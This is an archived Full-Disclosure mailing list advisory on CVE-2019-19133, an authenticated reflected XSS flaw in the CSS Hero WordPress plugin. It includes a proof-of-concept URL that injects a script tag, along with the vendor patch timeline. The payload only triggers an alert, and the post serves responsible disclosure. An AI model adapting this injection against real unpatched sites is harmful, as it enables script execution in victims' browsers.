| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFHyUMOtPsmb0n6stZk3qYsrEMRHKEy=jakYKMdY-ZHjddpJ2Q@mail.gmail.com> Date: Mon, 2 Dec 2019 19:53:38 -0600 From: Ho oper Ca ry <cary.e.hooper@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Reflected XSS in CSS Hero (v.4.0.3) Team, Document Title =============== CVE-2019-19133 Reflected XSS in CSS Hero (<= v.4.0.3) WordPress plugin. Product Description =============== CSS Hero WordPress Plugin A live WordPress Theme editor that works without modifying any of your theme files. Very low performance footprint: only generates and adds a single static CSS file to your site. Homepage: https://www.csshero.org/ CSS Hero is vulnerable to a reflected XSS attack (authenticated). PoC =============== Steps: 1) Authenticate to the WordPress application with the CSS Hero plugin installed. 2) Navigate to the following vulnerable link: hxxp:// vulnerable.wordpress.com/?csshero_action=edit_page&rand=1015&foo%22%3E%3C/iframe%3E%3Cscript%3Ealert(%27Reflected%20XSS%20in%20CSS%20Hero%204.0.3%27)%3C/script%3E%3Ciframe%3Ebar 3) JavaScript executes within the context of the browser. The arbitrary parameter and value are reflected into the returned HTML. Responsible Disclosure Information =============== Vendor Contacted: 11/17 Date Patched: 11/20 Patched Version: v.4.0.7 Public Disclosure: 12/2 Cary Hooper @nopantrootdance _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists